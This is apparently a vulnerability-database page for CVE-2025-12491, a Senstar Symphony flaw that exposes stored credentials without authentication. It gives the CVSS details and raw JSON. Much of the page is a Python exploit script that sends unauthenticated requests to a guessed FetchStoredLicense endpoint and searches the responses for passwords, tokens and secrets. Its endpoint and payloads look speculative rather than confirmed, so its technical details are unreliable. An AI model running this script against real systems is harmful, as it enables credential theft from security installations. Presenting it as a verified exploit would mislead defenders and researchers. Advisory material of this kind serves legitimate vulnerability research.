Security Vulnerability Report
CVE-2025-12491 CVSS 7.5 HIGH

CVE-2025-12491

Published: 2025-12-23 22:15:44
Last Modified: 2026-04-15 00:35:42

Description

Senstar Symphony FetchStoredLicense Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Senstar Symphony. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of FetchStoredLicense method. The issue results from the exposure of sensitive information. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-26908.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Senstar Symphony < latest secure version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-12491 PoC - Senstar Symphony FetchStoredLicense Information Disclosure
# Target: Senstar Symphony with vulnerable FetchStoredLicense endpoint


def exploit_cve_2025_12491(target_url):
    """
    Exploit for CVE-2025-12491: Senstar Symphony FetchStoredLicense Information Disclosure
    This PoC demonstrates how an unauthenticated attacker can retrieve stored credentials.
    """
    # Construct the vulnerable endpoint
    # The FetchStoredLicense method is typically exposed via the API endpoint
    endpoint = f"{target_url.rstrip('/')}/api/FetchStoredLicense"

    # Try different payload variations
    payloads = [
        {"method": "FetchStoredLicense", "params": {}},
        {"method": "FetchStoredLicense", "params": {"licenseKey": "test"}},
        {"action": "FetchStoredLicense"},
        {"type": "FetchStoredLicense"}
    ]

    results = []
    for payload in payloads:
        try:
            # Send request without authentication
            response = requests.post(
                endpoint,
                json=payload,
                headers={
                    "Content-Type": "application/json",
                    "User-Agent": "Mozilla/5.0"
                },
                timeout=10,
                verify=False
            )

            if response.status_code == 200:
                data = response.json()
                # Check if sensitive information is returned
                if isinstance(data, dict) and any(
                    key in str(data).lower()
                    for key in ['password', 'credential', 'license', 'key', 'token', 'secret']
                ):
                    results.append({
                        "payload": payload,
                        "status": "VULNERABLE",
                        "response": data
                    })
                else:
                    results.append({
                        "payload": payload,
                        "status": "RESPONSE_RECEIVED",
                        "response": data
                    })
            else:
                results.append({
                    "payload": payload,
                    "status": f"HTTP_{response.status_code}"
                })
        except requests.exceptions.RequestException as e:
            results.append({
                "payload": payload,
                "status": "ERROR",
                "error": str(e)
            })

    return results


if __name__ == "__main__":
    import sys

    if len(sys.argv) < 2:
        print("Usage: python cve_2025_12491_poc.py <target_url>")
        print("Example: python cve_2025_12491_poc.py https://vulnerable-senstar-server.com")
        sys.exit(1)

    target = sys.argv[1]
    print(f"[*] Testing target: {target}")
    print(f"[*] Exploiting CVE-2025-12491...")

    results = exploit_cve_2025_12491(target)
    for result in results:
        print(f"\n[Result] Payload: {result['payload']}")
        print(f"Status: {result['status']}")
        if 'response' in result:
            print(f"Response: {json.dumps(result['response'], indent=2)}")

    print("\n[*] Scan complete. Review results above for sensitive data exposure.")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12491", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:43.593", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Senstar Symphony FetchStoredLicense Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Senstar Symphony. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of FetchStoredLicense method. The issue results from the exposure of sensitive information. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-26908."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1060/", "source": "[email protected]"}]}}